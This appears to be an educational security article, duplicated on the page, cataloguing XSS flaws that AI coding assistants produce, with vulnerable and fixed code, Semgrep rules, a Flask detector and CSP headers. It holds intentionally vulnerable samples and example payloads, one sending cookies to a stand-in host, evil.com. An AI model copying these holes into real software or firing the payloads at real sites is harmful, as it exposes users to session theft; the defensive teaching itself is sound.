XSS Vulnerabilities from AI-Generated Code

beginner11 min readUpdated 2026-03-20

Analysis of cross-site scripting patterns produced by LLM code generation, covering DOM XSS, reflected XSS, and framework-specific bypass patterns.

code-gen-security xss web-security llm-vulnerabilities

Overview

Cross-site scripting (XSS) is the second most common vulnerability class that LLMs introduce into generated code, after SQL injection. AI coding assistants frequently generate code that renders user input without proper encoding, uses innerHTML or dangerouslySetInnerHTML for dynamic content, and constructs HTML strings through template literals. These patterns create reflected, stored, and DOM-based XSS vulnerabilities.

The problem is particularly insidious because LLM-generated XSS often appears in code that is functionally correct. The application works as expected during manual testing, and only careful security review reveals that user input flows to the DOM without sanitization. This article catalogs the most common XSS patterns in AI-generated code and provides detection and prevention strategies.

Why LLMs Generate XSS

Training Data Bias

LLMs learn from publicly available code, tutorials, and documentation. XSS-vulnerable patterns dominate training data for the same reasons SQL injection does:

Tutorial simplification: Tutorials often skip output encoding to focus on functionality.
Legacy code prevalence: Older JavaScript and PHP code rarely uses modern XSS prevention.
Framework escape hatches: React's dangerouslySetInnerHTML and Angular's bypassSecurityTrustHtml appear in documentation and tutorials about how to render rich content.

# Catalog of XSS patterns commonly generated by AI coding assistants
 
XSS_PATTERN_CATALOG = {
    "innerHTML_assignment": {
        "severity": "critical",
        "frequency": "very_common",
        "framework": "vanilla_js",
        "insecure": '''
// LLM-generated: Display user search query
function displaySearchResults(query, results) {
    document.getElementById("search-header").innerHTML =
        `<h2>Results for: ${query}</h2>`;
    // XSS: query is rendered directly as HTML
}
''',
        "secure": '''
// Secure: Use textContent for plain text
function displaySearchResults(query, results) {
    const header = document.getElementById("search-header");
    const h2 = document.createElement("h2");
    h2.textContent = `Results for: ${query}`;
    header.replaceChildren(h2);
}
''',
        "cwe": "CWE-79",
    },
 
    "react_dangerously_set": {
        "severity": "critical",
        "frequency": "common",
        "framework": "react",
        "insecure": '''
// LLM-generated: Render user bio with formatting
function UserBio({ bio }) {
    return (
        <div dangerouslySetInnerHTML={{ __html: bio }} />
    );
    // XSS: bio may contain script tags
}
''',
        "secure": '''
// Secure: Use DOMPurify for sanitized HTML rendering
import DOMPurify from "dompurify";
 
function UserBio({ bio }) {
    const sanitized = DOMPurify.sanitize(bio, {
        ALLOWED_TAGS: ["b", "i", "em", "strong", "p", "br"],
        ALLOWED_ATTR: [],
    });
    return (
        <div dangerouslySetInnerHTML={{ __html: sanitized }} />
    );
}
''',
        "cwe": "CWE-79",
    },
 
    "flask_template_bypass": {
        "severity": "critical",
        "frequency": "common",
        "framework": "flask",
        "insecure": '''
# LLM-generated: Render user profile page
from flask import Flask, request
from markupsafe import Markup
 
app = Flask(__name__)
 
@app.route("/profile")
def profile():
    name = request.args.get("name", "")
    # LLM uses Markup() to "fix" escaping issues in templates
    return f"<html><body><h1>Welcome, {Markup(name)}</h1></body></html>"
    # XSS: Markup() marks the string as safe, bypassing auto-escaping
''',
        "secure": '''
# Secure: Use Jinja2 templates with auto-escaping
from flask import Flask, request, render_template_string
 
app = Flask(__name__)
 
@app.route("/profile")
def profile():
    name = request.args.get("name", "")
    # Jinja2 auto-escapes variables by default
    return render_template_string(
        "<html><body><h1>Welcome, {{ name }}</h1></body></html>",
        name=name,
    )
''',
        "cwe": "CWE-79",
    },
 
    "django_mark_safe": {
        "severity": "critical",
        "frequency": "moderate",
        "framework": "django",
        "insecure": '''
# LLM-generated: Custom template tag
from django.utils.safestring import mark_safe
 
def render_user_content(content):
    """Render user-submitted content with formatting."""
    # LLM uses mark_safe to suppress Django's auto-escaping
    formatted = content.replace("\\n", "<br>")
    return mark_safe(formatted)
    # XSS: user content is marked safe without sanitization
''',
        "secure": '''
# Secure: Escape first, then add safe formatting
from django.utils.html import escape
from django.utils.safestring import mark_safe
 
def render_user_content(content):
    """Render user-submitted content with formatting."""
    # Escape user content first
    escaped = escape(content)
    # Then add safe formatting
    formatted = escaped.replace("\\n", "<br>")
    return mark_safe(formatted)
''',
        "cwe": "CWE-79",
    },
 
    "jquery_html_method": {
        "severity": "critical",
        "frequency": "common",
        "framework": "jquery",
        "insecure": '''
// LLM-generated: Display notification
function showNotification(message) {
    $("#notification").html(`<div class="alert">${message}</div>`);
    // XSS: message rendered as HTML
}
''',
        "secure": '''
// Secure: Use .text() for user content
function showNotification(message) {
    const alert = $("<div>").addClass("alert").text(message);
    $("#notification").empty().append(alert);
}
''',
        "cwe": "CWE-79",
    },
}

DOM-Based XSS from AI Code

URL Parameter to DOM Patterns

LLMs frequently generate code that reads URL parameters and inserts them into the DOM without encoding:

# Common DOM XSS patterns from LLMs
 
DOM_XSS_PATTERNS = {
    "url_param_to_innerhtml": {
        "code": '''
// LLM generates this for "read query param and display it"
const params = new URLSearchParams(window.location.search);
const name = params.get("name");
document.getElementById("greeting").innerHTML = `Hello, ${name}!`;
''',
        "exploit": "?name=<img src=x onerror=alert(document.cookie)>",
        "fix": "Use textContent instead of innerHTML",
    },
 
    "hash_to_dom": {
        "code": '''
// LLM generates this for "single page app routing"
function loadPage() {
    const page = window.location.hash.substring(1);
    document.getElementById("content").innerHTML = `<h1>${page}</h1>`;
}
window.addEventListener("hashchange", loadPage);
''',
        "exploit": "#<img src=x onerror=fetch('https://evil.com/?c='+document.cookie)>",
        "fix": "Validate hash against allowlist, use textContent",
    },
 
    "postmessage_to_dom": {
        "code": '''
// LLM generates this for "receive messages from iframe"
window.addEventListener("message", (event) => {
    document.getElementById("output").innerHTML = event.data;
});
''',
        "exploit": "Parent frame sends HTML with script payload",
        "fix": "Validate event.origin, use textContent, sanitize data",
    },
}

JavaScript Template Literal Injection

LLMs commonly generate template literals that construct HTML, creating XSS sinks:

# Template literal XSS patterns
 
TEMPLATE_LITERAL_XSS = '''
// Pattern 1: Building HTML tables from data (very common LLM output)
function renderUserTable(users) {
    // INSECURE: LLM builds HTML via template literals
    const rows = users.map(user => `
        <tr>
            <td>${user.name}</td>
            <td>${user.email}</td>
            <td>${user.bio}</td>
        </tr>
    `).join("");
 
    document.getElementById("user-table").innerHTML = `
        <table>
            <thead><tr><th>Name</th><th>Email</th><th>Bio</th></tr></thead>
            <tbody>${rows}</tbody>
        </table>
    `;
    // Any field containing HTML (especially bio) creates XSS
}
 
// SECURE: Use DOM APIs
function renderUserTableSafe(users) {
    const table = document.createElement("table");
    const thead = document.createElement("thead");
    const headerRow = document.createElement("tr");
    ["Name", "Email", "Bio"].forEach(text => {
        const th = document.createElement("th");
        th.textContent = text;
        headerRow.appendChild(th);
    });
    thead.appendChild(headerRow);
    table.appendChild(thead);
 
    const tbody = document.createElement("tbody");
    users.forEach(user => {
        const row = document.createElement("tr");
        [user.name, user.email, user.bio].forEach(value => {
            const td = document.createElement("td");
            td.textContent = value;  // Safe: textContent auto-escapes
            row.appendChild(td);
        });
        tbody.appendChild(row);
    });
    table.appendChild(tbody);
 
    const container = document.getElementById("user-table");
    container.replaceChildren(table);
}
'''

Framework-Specific Patterns

React XSS Patterns

# React-specific XSS patterns from AI code generation
 
REACT_XSS_PATTERNS = {
    "dangerouslySetInnerHTML_user_content": {
        "frequency": "common",
        "context": "LLMs suggest this for rendering formatted user content",
        "insecure_code": '''
function Comment({ comment }) {
    // LLM generates this when asked to "render markdown comments"
    return (
        <div className="comment">
            <strong>{comment.author}</strong>
            <div dangerouslySetInnerHTML={{ __html: comment.body }} />
        </div>
    );
}
''',
        "why_llm_suggests_this": (
            "Training data contains many examples of rendering "
            "HTML content with dangerouslySetInnerHTML. LLMs don't "
            "distinguish between trusted and untrusted HTML."
        ),
    },
 
    "href_javascript_protocol": {
        "frequency": "moderate",
        "context": "LLMs generate user-controllable href attributes",
        "insecure_code": '''
function UserLink({ user }) {
    // LLM generates this for "link to user website"
    return (
        <a href={user.website}>Visit {user.name}'s site</a>
    );
    // XSS if user.website = "javascript:alert(document.cookie)"
}
''',
        "secure_code": '''
function UserLink({ user }) {
    // Validate URL protocol
    const isValidUrl = (url) => {
        try {
            const parsed = new URL(url);
            return ["http:", "https:"].includes(parsed.protocol);
        } catch {
            return false;
        }
    };
 
    if (!isValidUrl(user.website)) return null;
 
    return (
        <a href={user.website} rel="noopener noreferrer">
            Visit {user.name}'s site
        </a>
    );
}
''',
    },
 
    "style_injection": {
        "frequency": "low",
        "context": "LLMs generate dynamic styles from user input",
        "insecure_code": '''
function ThemedComponent({ userTheme }) {
    // LLM generates this for "custom theme support"
    return (
        <div style={{ background: userTheme.backgroundColor }}>
            Content
        </div>
    );
    // Style injection if userTheme comes from untrusted source
}
''',
    },
}

Python Web Framework Patterns

# Flask and Django XSS patterns from AI code generation
 
from flask import Flask, request, render_template_string, jsonify
 
app = Flask(__name__)
 
# INSECURE Pattern 1: String-based HTML response (very common LLM output)
@app.route("/search")
def search_insecure():
    """LLM generates this for 'create a search endpoint'."""
    query = request.args.get("q", "")
    results = perform_search(query)  # Assume this returns results
 
    # LLM constructs HTML directly with f-strings
    html = f"""
    <html>
    <body>
        <h1>Search Results for: {query}</h1>
        <ul>
            {"".join(f"<li>{r}</li>" for r in results)}
        </ul>
    </body>
    </html>
    """
    return html  # XSS: query and results rendered without escaping
 
# SECURE Pattern 1: Use Jinja2 templates
@app.route("/search")
def search_secure():
    """Secure version using Jinja2 auto-escaping."""
    query = request.args.get("q", "")
    results = perform_search(query)
 
    # Jinja2 auto-escapes {{ }} variables
    return render_template_string("""
    <html>
    <body>
        <h1>Search Results for: {{ query }}</h1>
        <ul>
            {% for r in results %}
            <li>{{ r }}</li>
            {% endfor %}
        </ul>
    </body>
    </html>
    """, query=query, results=results)
 
# INSECURE Pattern 2: JSON response with HTML content
@app.route("/api/preview")
def preview_insecure():
    """LLM generates this for 'create content preview API'."""
    content = request.json.get("content", "")
    # LLM wraps content in HTML for preview
    preview_html = f"<div class='preview'>{content}</div>"
    return jsonify({"html": preview_html})
    # XSS if frontend renders this HTML without sanitization
 
# SECURE Pattern 2: Return plain text, let frontend render safely
@app.route("/api/preview")
def preview_secure():
    """Secure version returning structured data."""
    content = request.json.get("content", "")
    return jsonify({
        "text": content,  # Frontend uses textContent to render
        "word_count": len(content.split()),
    })
 
def perform_search(query):
    """Placeholder search function."""
    return [f"Result for {query}"]

Detection Strategies

Semgrep Rules for LLM-Generated XSS

SEMGREP_XSS_RULES = """
rules:
  - id: js-innerhtml-user-input
    patterns:
      - pattern: |
          $EL.innerHTML = $VALUE
      - pattern-not: |
          $EL.innerHTML = ""
      - pattern-not: |
          $EL.innerHTML = DOMPurify.sanitize(...)
    message: >
      innerHTML assignment with potentially untrusted content.
      Use textContent for plain text or DOMPurify.sanitize() for HTML.
      AI coding assistants commonly generate this pattern.
    languages: [javascript, typescript]
    severity: WARNING
    metadata:
      cwe: CWE-79
 
  - id: react-dangerously-set-innerhtml
    pattern: |
      dangerouslySetInnerHTML={{ __html: $VALUE }}
    message: >
      dangerouslySetInnerHTML used. Ensure $VALUE is sanitized with
      DOMPurify. AI assistants frequently suggest this for rendering
      formatted content.
    languages: [javascript, typescript]
    severity: ERROR
    metadata:
      cwe: CWE-79
 
  - id: flask-fstring-html-response
    patterns:
      - pattern: |
          return f"<...$VAR..."
    message: >
      Flask endpoint returns f-string containing HTML. Use
      render_template or render_template_string with Jinja2
      auto-escaping instead.
    languages: [python]
    severity: ERROR
    metadata:
      cwe: CWE-79
 
  - id: django-mark-safe-user-input
    patterns:
      - pattern: |
          mark_safe($TAINTED)
      - pattern-not: |
          mark_safe(escape($TAINTED))
    message: >
      mark_safe() called on potentially unsanitized input.
      Escape content before marking safe. AI assistants use
      mark_safe to suppress escaping without understanding the risk.
    languages: [python]
    severity: ERROR
    metadata:
      cwe: CWE-79
 
  - id: js-document-write
    pattern: document.write(...)
    message: >
      document.write() with dynamic content creates XSS risk.
      Use DOM APIs instead. AI coding assistants generate this
      for legacy-style code.
    languages: [javascript]
    severity: WARNING
    metadata:
      cwe: CWE-79
"""

Automated XSS Testing for AI-Generated Code

import ast
import sys
from pathlib import Path
 
class FlaskXSSDetector(ast.NodeVisitor):
    """Detect XSS patterns in Flask applications generated by AI."""
 
    def __init__(self, filename: str):
        self.filename = filename
        self.findings: list[dict] = []
 
    def visit_Return(self, node: ast.Return):
        """Check return statements for HTML string construction."""
        if node.value is None:
            return
 
        # Detect f-string returns with HTML
        if isinstance(node.value, ast.JoinedStr):
            for value in node.value.values:
                if isinstance(value, ast.Constant) and isinstance(value.value, str):
                    if "<" in value.value and ">" in value.value:
                        self.findings.append({
                            "file": self.filename,
                            "line": node.lineno,
                            "type": "f-string HTML return",
                            "severity": "ERROR",
                            "message": "Return value constructs HTML via f-string. Use Jinja2 templates.",
                        })
                        return
 
        self.generic_visit(node)
 
    def visit_Call(self, node: ast.Call):
        """Check for mark_safe and Markup usage."""
        if isinstance(node.func, ast.Name):
            if node.func.id in ("mark_safe", "Markup"):
                self.findings.append({
                    "file": self.filename,
                    "line": node.lineno,
                    "type": f"{node.func.id}() usage",
                    "severity": "WARNING",
                    "message": f"{node.func.id}() bypasses auto-escaping. Verify input is sanitized.",
                })
 
        self.generic_visit(node)
 
def scan_flask_xss(project_path: str) -> list[dict]:
    """Scan a Flask project for XSS vulnerabilities."""
    all_findings = []
    for py_file in Path(project_path).rglob("*.py"):
        try:
            source = py_file.read_text()
            tree = ast.parse(source)
            detector = FlaskXSSDetector(str(py_file))
            detector.visit(tree)
            all_findings.extend(detector.findings)
        except (SyntaxError, UnicodeDecodeError):
            pass
    return all_findings

Prevention Framework

Content Security Policy

In addition to code-level fixes, deploy Content Security Policy headers to limit XSS impact:

# Flask middleware for CSP headers
from flask import Flask
 
app = Flask(__name__)
 
@app.after_request
def add_security_headers(response):
    """Add security headers to mitigate XSS from AI-generated code."""
    response.headers["Content-Security-Policy"] = (
        "default-src 'self'; "
        "script-src 'self'; "
        "style-src 'self' 'unsafe-inline'; "
        "img-src 'self' data:; "
        "font-src 'self'; "
        "connect-src 'self'; "
        "frame-ancestors 'none'; "
        "base-uri 'self'; "
        "form-action 'self'"
    )
    response.headers["X-Content-Type-Options"] = "nosniff"
    response.headers["X-Frame-Options"] = "DENY"
    response.headers["X-XSS-Protection"] = "0"  # Deprecated but set to 0
    return response

Developer Guidance for AI-Assisted Development

Context	Insecure AI Pattern	Secure Alternative
Display user text	`innerHTML = userText`	`textContent = userText`
Render formatted content	`dangerouslySetInnerHTML={{ __html: content }}`	`DOMPurify.sanitize(content)` then `dangerouslySetInnerHTML`
Flask HTML response	`return f"<html>...{user_input}..."`	`return render_template("page.html", input=user_input)`
Django template	`mark_safe(user_content)`	`escape(user_content)` then `mark_safe()`
URL construction	`href={user_url}`	Validate protocol is `http:` or `https:` first
Build HTML table	Template literals with `${}`	`document.createElement()` + `textContent`

References

CWE-79: Improper Neutralization of Input During Web Page Generation — https://cwe.mitre.org/data/definitions/79.html
"Do Users Write More Insecure Code with AI Assistants?" — Perry et al., Stanford University, 2023 — https://arxiv.org/abs/2211.03622
OWASP Cross-Site Scripting Prevention Cheat Sheet — https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Scripting_Prevention_Cheat_Sheet.html
DOMPurify — https://github.com/cure53/DOMPurify
Semgrep XSS Rules — https://semgrep.dev/p/xss
React Security Best Practices — https://react.dev/reference/react-dom/components/common#dangerously-setting-the-inner-html

Edit this page on GitHub

XSS Vulnerabilities from AI-Generated Code

beginner11 min readUpdated 2026-03-20

Analysis of cross-site scripting patterns produced by LLM code generation, covering DOM XSS, reflected XSS, and framework-specific bypass patterns.

code-gen-security xss web-security llm-vulnerabilities

Tutorial simplification: Tutorials often skip output encoding to focus on functionality.
Legacy code prevalence: Older JavaScript and PHP code rarely uses modern XSS prevention.
Framework escape hatches: React's dangerouslySetInnerHTML and Angular's bypassSecurityTrustHtml appear in documentation and tutorials about how to render rich content.

# Catalog of XSS patterns commonly generated by AI coding assistants
 
XSS_PATTERN_CATALOG = {
    "innerHTML_assignment": {
        "severity": "critical",
        "frequency": "very_common",
        "framework": "vanilla_js",
        "insecure": '''
// LLM-generated: Display user search query
function displaySearchResults(query, results) {
    document.getElementById("search-header").innerHTML =
        `<h2>Results for: ${query}</h2>`;
    // XSS: query is rendered directly as HTML
}
''',
        "secure": '''
// Secure: Use textContent for plain text
function displaySearchResults(query, results) {
    const header = document.getElementById("search-header");
    const h2 = document.createElement("h2");
    h2.textContent = `Results for: ${query}`;
    header.replaceChildren(h2);
}
''',
        "cwe": "CWE-79",
    },
 
    "react_dangerously_set": {
        "severity": "critical",
        "frequency": "common",
        "framework": "react",
        "insecure": '''
// LLM-generated: Render user bio with formatting
function UserBio({ bio }) {
    return (
        <div dangerouslySetInnerHTML={{ __html: bio }} />
    );
    // XSS: bio may contain script tags
}
''',
        "secure": '''
// Secure: Use DOMPurify for sanitized HTML rendering
import DOMPurify from "dompurify";
 
function UserBio({ bio }) {
    const sanitized = DOMPurify.sanitize(bio, {
        ALLOWED_TAGS: ["b", "i", "em", "strong", "p", "br"],
        ALLOWED_ATTR: [],
    });
    return (
        <div dangerouslySetInnerHTML={{ __html: sanitized }} />
    );
}
''',
        "cwe": "CWE-79",
    },
 
    "flask_template_bypass": {
        "severity": "critical",
        "frequency": "common",
        "framework": "flask",
        "insecure": '''
# LLM-generated: Render user profile page
from flask import Flask, request
from markupsafe import Markup
 
app = Flask(__name__)
 
@app.route("/profile")
def profile():
    name = request.args.get("name", "")
    # LLM uses Markup() to "fix" escaping issues in templates
    return f"<html><body><h1>Welcome, {Markup(name)}</h1></body></html>"
    # XSS: Markup() marks the string as safe, bypassing auto-escaping
''',
        "secure": '''
# Secure: Use Jinja2 templates with auto-escaping
from flask import Flask, request, render_template_string
 
app = Flask(__name__)
 
@app.route("/profile")
def profile():
    name = request.args.get("name", "")
    # Jinja2 auto-escapes variables by default
    return render_template_string(
        "<html><body><h1>Welcome, {{ name }}</h1></body></html>",
        name=name,
    )
''',
        "cwe": "CWE-79",
    },
 
    "django_mark_safe": {
        "severity": "critical",
        "frequency": "moderate",
        "framework": "django",
        "insecure": '''
# LLM-generated: Custom template tag
from django.utils.safestring import mark_safe
 
def render_user_content(content):
    """Render user-submitted content with formatting."""
    # LLM uses mark_safe to suppress Django's auto-escaping
    formatted = content.replace("\\n", "<br>")
    return mark_safe(formatted)
    # XSS: user content is marked safe without sanitization
''',
        "secure": '''
# Secure: Escape first, then add safe formatting
from django.utils.html import escape
from django.utils.safestring import mark_safe
 
def render_user_content(content):
    """Render user-submitted content with formatting."""
    # Escape user content first
    escaped = escape(content)
    # Then add safe formatting
    formatted = escaped.replace("\\n", "<br>")
    return mark_safe(formatted)
''',
        "cwe": "CWE-79",
    },
 
    "jquery_html_method": {
        "severity": "critical",
        "frequency": "common",
        "framework": "jquery",
        "insecure": '''
// LLM-generated: Display notification
function showNotification(message) {
    $("#notification").html(`<div class="alert">${message}</div>`);
    // XSS: message rendered as HTML
}
''',
        "secure": '''
// Secure: Use .text() for user content
function showNotification(message) {
    const alert = $("<div>").addClass("alert").text(message);
    $("#notification").empty().append(alert);
}
''',
        "cwe": "CWE-79",
    },
}

DOM-Based XSS from AI Code

URL Parameter to DOM Patterns

LLMs frequently generate code that reads URL parameters and inserts them into the DOM without encoding:

# Common DOM XSS patterns from LLMs
 
DOM_XSS_PATTERNS = {
    "url_param_to_innerhtml": {
        "code": '''
// LLM generates this for "read query param and display it"
const params = new URLSearchParams(window.location.search);
const name = params.get("name");
document.getElementById("greeting").innerHTML = `Hello, ${name}!`;
''',
        "exploit": "?name=<img src=x onerror=alert(document.cookie)>",
        "fix": "Use textContent instead of innerHTML",
    },
 
    "hash_to_dom": {
        "code": '''
// LLM generates this for "single page app routing"
function loadPage() {
    const page = window.location.hash.substring(1);
    document.getElementById("content").innerHTML = `<h1>${page}</h1>`;
}
window.addEventListener("hashchange", loadPage);
''',
        "exploit": "#<img src=x onerror=fetch('https://evil.com/?c='+document.cookie)>",
        "fix": "Validate hash against allowlist, use textContent",
    },
 
    "postmessage_to_dom": {
        "code": '''
// LLM generates this for "receive messages from iframe"
window.addEventListener("message", (event) => {
    document.getElementById("output").innerHTML = event.data;
});
''',
        "exploit": "Parent frame sends HTML with script payload",
        "fix": "Validate event.origin, use textContent, sanitize data",
    },
}

JavaScript Template Literal Injection

LLMs commonly generate template literals that construct HTML, creating XSS sinks:

# Template literal XSS patterns
 
TEMPLATE_LITERAL_XSS = '''
// Pattern 1: Building HTML tables from data (very common LLM output)
function renderUserTable(users) {
    // INSECURE: LLM builds HTML via template literals
    const rows = users.map(user => `
        <tr>
            <td>${user.name}</td>
            <td>${user.email}</td>
            <td>${user.bio}</td>
        </tr>
    `).join("");
 
    document.getElementById("user-table").innerHTML = `
        <table>
            <thead><tr><th>Name</th><th>Email</th><th>Bio</th></tr></thead>
            <tbody>${rows}</tbody>
        </table>
    `;
    // Any field containing HTML (especially bio) creates XSS
}
 
// SECURE: Use DOM APIs
function renderUserTableSafe(users) {
    const table = document.createElement("table");
    const thead = document.createElement("thead");
    const headerRow = document.createElement("tr");
    ["Name", "Email", "Bio"].forEach(text => {
        const th = document.createElement("th");
        th.textContent = text;
        headerRow.appendChild(th);
    });
    thead.appendChild(headerRow);
    table.appendChild(thead);
 
    const tbody = document.createElement("tbody");
    users.forEach(user => {
        const row = document.createElement("tr");
        [user.name, user.email, user.bio].forEach(value => {
            const td = document.createElement("td");
            td.textContent = value;  // Safe: textContent auto-escapes
            row.appendChild(td);
        });
        tbody.appendChild(row);
    });
    table.appendChild(tbody);
 
    const container = document.getElementById("user-table");
    container.replaceChildren(table);
}
'''

Framework-Specific Patterns

React XSS Patterns

# React-specific XSS patterns from AI code generation
 
REACT_XSS_PATTERNS = {
    "dangerouslySetInnerHTML_user_content": {
        "frequency": "common",
        "context": "LLMs suggest this for rendering formatted user content",
        "insecure_code": '''
function Comment({ comment }) {
    // LLM generates this when asked to "render markdown comments"
    return (
        <div className="comment">
            <strong>{comment.author}</strong>
            <div dangerouslySetInnerHTML={{ __html: comment.body }} />
        </div>
    );
}
''',
        "why_llm_suggests_this": (
            "Training data contains many examples of rendering "
            "HTML content with dangerouslySetInnerHTML. LLMs don't "
            "distinguish between trusted and untrusted HTML."
        ),
    },
 
    "href_javascript_protocol": {
        "frequency": "moderate",
        "context": "LLMs generate user-controllable href attributes",
        "insecure_code": '''
function UserLink({ user }) {
    // LLM generates this for "link to user website"
    return (
        <a href={user.website}>Visit {user.name}'s site</a>
    );
    // XSS if user.website = "javascript:alert(document.cookie)"
}
''',
        "secure_code": '''
function UserLink({ user }) {
    // Validate URL protocol
    const isValidUrl = (url) => {
        try {
            const parsed = new URL(url);
            return ["http:", "https:"].includes(parsed.protocol);
        } catch {
            return false;
        }
    };
 
    if (!isValidUrl(user.website)) return null;
 
    return (
        <a href={user.website} rel="noopener noreferrer">
            Visit {user.name}'s site
        </a>
    );
}
''',
    },
 
    "style_injection": {
        "frequency": "low",
        "context": "LLMs generate dynamic styles from user input",
        "insecure_code": '''
function ThemedComponent({ userTheme }) {
    // LLM generates this for "custom theme support"
    return (
        <div style={{ background: userTheme.backgroundColor }}>
            Content
        </div>
    );
    // Style injection if userTheme comes from untrusted source
}
''',
    },
}

Python Web Framework Patterns

# Flask and Django XSS patterns from AI code generation
 
from flask import Flask, request, render_template_string, jsonify
 
app = Flask(__name__)
 
# INSECURE Pattern 1: String-based HTML response (very common LLM output)
@app.route("/search")
def search_insecure():
    """LLM generates this for 'create a search endpoint'."""
    query = request.args.get("q", "")
    results = perform_search(query)  # Assume this returns results
 
    # LLM constructs HTML directly with f-strings
    html = f"""
    <html>
    <body>
        <h1>Search Results for: {query}</h1>
        <ul>
            {"".join(f"<li>{r}</li>" for r in results)}
        </ul>
    </body>
    </html>
    """
    return html  # XSS: query and results rendered without escaping
 
# SECURE Pattern 1: Use Jinja2 templates
@app.route("/search")
def search_secure():
    """Secure version using Jinja2 auto-escaping."""
    query = request.args.get("q", "")
    results = perform_search(query)
 
    # Jinja2 auto-escapes {{ }} variables
    return render_template_string("""
    <html>
    <body>
        <h1>Search Results for: {{ query }}</h1>
        <ul>
            {% for r in results %}
            <li>{{ r }}</li>
            {% endfor %}
        </ul>
    </body>
    </html>
    """, query=query, results=results)
 
# INSECURE Pattern 2: JSON response with HTML content
@app.route("/api/preview")
def preview_insecure():
    """LLM generates this for 'create content preview API'."""
    content = request.json.get("content", "")
    # LLM wraps content in HTML for preview
    preview_html = f"<div class='preview'>{content}</div>"
    return jsonify({"html": preview_html})
    # XSS if frontend renders this HTML without sanitization
 
# SECURE Pattern 2: Return plain text, let frontend render safely
@app.route("/api/preview")
def preview_secure():
    """Secure version returning structured data."""
    content = request.json.get("content", "")
    return jsonify({
        "text": content,  # Frontend uses textContent to render
        "word_count": len(content.split()),
    })
 
def perform_search(query):
    """Placeholder search function."""
    return [f"Result for {query}"]

Detection Strategies

Semgrep Rules for LLM-Generated XSS

SEMGREP_XSS_RULES = """
rules:
  - id: js-innerhtml-user-input
    patterns:
      - pattern: |
          $EL.innerHTML = $VALUE
      - pattern-not: |
          $EL.innerHTML = ""
      - pattern-not: |
          $EL.innerHTML = DOMPurify.sanitize(...)
    message: >
      innerHTML assignment with potentially untrusted content.
      Use textContent for plain text or DOMPurify.sanitize() for HTML.
      AI coding assistants commonly generate this pattern.
    languages: [javascript, typescript]
    severity: WARNING
    metadata:
      cwe: CWE-79
 
  - id: react-dangerously-set-innerhtml
    pattern: |
      dangerouslySetInnerHTML={{ __html: $VALUE }}
    message: >
      dangerouslySetInnerHTML used. Ensure $VALUE is sanitized with
      DOMPurify. AI assistants frequently suggest this for rendering
      formatted content.
    languages: [javascript, typescript]
    severity: ERROR
    metadata:
      cwe: CWE-79
 
  - id: flask-fstring-html-response
    patterns:
      - pattern: |
          return f"<...$VAR..."
    message: >
      Flask endpoint returns f-string containing HTML. Use
      render_template or render_template_string with Jinja2
      auto-escaping instead.
    languages: [python]
    severity: ERROR
    metadata:
      cwe: CWE-79
 
  - id: django-mark-safe-user-input
    patterns:
      - pattern: |
          mark_safe($TAINTED)
      - pattern-not: |
          mark_safe(escape($TAINTED))
    message: >
      mark_safe() called on potentially unsanitized input.
      Escape content before marking safe. AI assistants use
      mark_safe to suppress escaping without understanding the risk.
    languages: [python]
    severity: ERROR
    metadata:
      cwe: CWE-79
 
  - id: js-document-write
    pattern: document.write(...)
    message: >
      document.write() with dynamic content creates XSS risk.
      Use DOM APIs instead. AI coding assistants generate this
      for legacy-style code.
    languages: [javascript]
    severity: WARNING
    metadata:
      cwe: CWE-79
"""

Automated XSS Testing for AI-Generated Code

import ast
import sys
from pathlib import Path
 
class FlaskXSSDetector(ast.NodeVisitor):
    """Detect XSS patterns in Flask applications generated by AI."""
 
    def __init__(self, filename: str):
        self.filename = filename
        self.findings: list[dict] = []
 
    def visit_Return(self, node: ast.Return):
        """Check return statements for HTML string construction."""
        if node.value is None:
            return
 
        # Detect f-string returns with HTML
        if isinstance(node.value, ast.JoinedStr):
            for value in node.value.values:
                if isinstance(value, ast.Constant) and isinstance(value.value, str):
                    if "<" in value.value and ">" in value.value:
                        self.findings.append({
                            "file": self.filename,
                            "line": node.lineno,
                            "type": "f-string HTML return",
                            "severity": "ERROR",
                            "message": "Return value constructs HTML via f-string. Use Jinja2 templates.",
                        })
                        return
 
        self.generic_visit(node)
 
    def visit_Call(self, node: ast.Call):
        """Check for mark_safe and Markup usage."""
        if isinstance(node.func, ast.Name):
            if node.func.id in ("mark_safe", "Markup"):
                self.findings.append({
                    "file": self.filename,
                    "line": node.lineno,
                    "type": f"{node.func.id}() usage",
                    "severity": "WARNING",
                    "message": f"{node.func.id}() bypasses auto-escaping. Verify input is sanitized.",
                })
 
        self.generic_visit(node)
 
def scan_flask_xss(project_path: str) -> list[dict]:
    """Scan a Flask project for XSS vulnerabilities."""
    all_findings = []
    for py_file in Path(project_path).rglob("*.py"):
        try:
            source = py_file.read_text()
            tree = ast.parse(source)
            detector = FlaskXSSDetector(str(py_file))
            detector.visit(tree)
            all_findings.extend(detector.findings)
        except (SyntaxError, UnicodeDecodeError):
            pass
    return all_findings

Prevention Framework

Content Security Policy

In addition to code-level fixes, deploy Content Security Policy headers to limit XSS impact:

# Flask middleware for CSP headers
from flask import Flask
 
app = Flask(__name__)
 
@app.after_request
def add_security_headers(response):
    """Add security headers to mitigate XSS from AI-generated code."""
    response.headers["Content-Security-Policy"] = (
        "default-src 'self'; "
        "script-src 'self'; "
        "style-src 'self' 'unsafe-inline'; "
        "img-src 'self' data:; "
        "font-src 'self'; "
        "connect-src 'self'; "
        "frame-ancestors 'none'; "
        "base-uri 'self'; "
        "form-action 'self'"
    )
    response.headers["X-Content-Type-Options"] = "nosniff"
    response.headers["X-Frame-Options"] = "DENY"
    response.headers["X-XSS-Protection"] = "0"  # Deprecated but set to 0
    return response

Developer Guidance for AI-Assisted Development

Context	Insecure AI Pattern	Secure Alternative
Display user text	`innerHTML = userText`	`textContent = userText`
Render formatted content	`dangerouslySetInnerHTML={{ __html: content }}`	`DOMPurify.sanitize(content)` then `dangerouslySetInnerHTML`
Flask HTML response	`return f"<html>...{user_input}..."`	`return render_template("page.html", input=user_input)`
Django template	`mark_safe(user_content)`	`escape(user_content)` then `mark_safe()`
URL construction	`href={user_url}`	Validate protocol is `http:` or `https:` first
Build HTML table	Template literals with `${}`	`document.createElement()` + `textContent`

References

CWE-79: Improper Neutralization of Input During Web Page Generation — https://cwe.mitre.org/data/definitions/79.html
"Do Users Write More Insecure Code with AI Assistants?" — Perry et al., Stanford University, 2023 — https://arxiv.org/abs/2211.03622
OWASP Cross-Site Scripting Prevention Cheat Sheet — https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Scripting_Prevention_Cheat_Sheet.html
DOMPurify — https://github.com/cure53/DOMPurify
